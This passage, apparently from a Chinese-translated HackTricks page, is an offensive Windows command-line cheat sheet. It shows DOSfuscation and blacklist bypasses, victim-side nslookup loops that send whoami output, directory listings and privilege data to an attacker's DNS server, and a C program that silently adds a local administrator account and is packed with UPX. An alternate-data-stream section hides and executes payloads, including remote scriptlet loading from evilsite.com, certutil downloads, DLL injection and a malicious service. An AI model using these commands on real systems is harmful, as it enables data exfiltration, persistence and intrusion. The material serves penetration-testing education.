By employing these techniques, it is possible to bypass character blacklisting and successfully execute commands on a target system. However, it is important to note that these techniques may not work in all scenarios, as the effectiveness of character blacklisting varies depending on the specific implementation and configuration of the target system.

通过使用这些技术，可以绕过字符黑名单并成功在目标系统上执行命令。然而，需要注意的是，这些技术可能在所有情况下都不起作用，因为字符黑名单的有效性取决于目标系统的具体实现和配置。

echo %HOMEPATH:~6,-11%   #\
who^ami   #whoami

DOSfuscation

生成一个混淆的CMD命令行

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding

监听地址访问控制列表

您可以在没有管理员权限的情况下监听 http://+:80/Temporary_Listen_Addresses/。

netsh http show urlacl

手动DNS shell

攻击者（Kali）必须使用以下两个选项之一：

sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

受害者

for /f tokens _**_技术：这使我们能够执行命令，获取每行的前X个单词，并将其通过DNS发送到我们的服务器

for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one

您还可以重定向输出，然后读取它。

whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>

从C代码中调用CMD

To call CMD from C code, you can use the system() function provided by the C standard library. This function allows you to execute a command in the command prompt.

Here is an example of how to call CMD from C code:

#include <stdlib.h>

int main() {
    // Command to be executed
    char command[] = "dir";

    // Calling CMD using system() function
    system(command);

    return 0;
}

In the above example, the system() function is used to execute the dir command, which lists the files and directories in the current directory. You can replace dir with any other CMD command you want to execute.

To compile and run the above code, you can use a C compiler such as GCC. Save the code in a file with a .c extension (e.g., call_cmd.c), and then compile it using the following command:

gcc call_cmd.c -o call_cmd

After compiling, you can run the program by executing the generated executable file:

./call_cmd

This will call CMD and execute the specified command. The output of the command will be displayed in the command prompt.

#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */

// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}

备用数据流速查表（ADS/备用数据流）

来自https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

##Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
set-content - path {path to the file} - stream {name of the stream}

## Discover ADS contecnt
dir /R
streams.exe <c:\path\to\file> #Binary from sysinternals#
Get-Item -Path .\fie.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

##Extract content from ADS###
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
more < c:\ads\file.txt:test.exe

##Executing the ADS content###

* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

* Rundll32
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll

* Cscript
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

* Wscript
wscript c:\ads\file.txt:script.vbs
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js

* Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"

* Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

* MSHTA
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)

* Control.exe
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209

* Create service and run
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

* Powershell.exe
powershell -ep bypass - < c:\temp:ttt

* Powershell.exe
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"

* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}

* Regedit.exe
regedit c:\ads\file.txt:regfile.reg

* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile

* AppVLP.exe
AppVLP.exe c:\windows\tracing\test.txt:ha.exe

* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904

* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* ieframe.dll , shdocvw.dll (ads)
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* bash.exe
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* Regsvr32
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在 HackTricks 中看到你的公司广告吗？或者你想获得PEASS 的最新版本或下载 HackTricks 的 PDF吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品——The PEASS Family
• 获得官方 PEASS & HackTricks 商品
• 加入 💬 Discord 群组 或 Telegram 群组，或者关注我在推特上的🐦@carlospolopm。
• 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。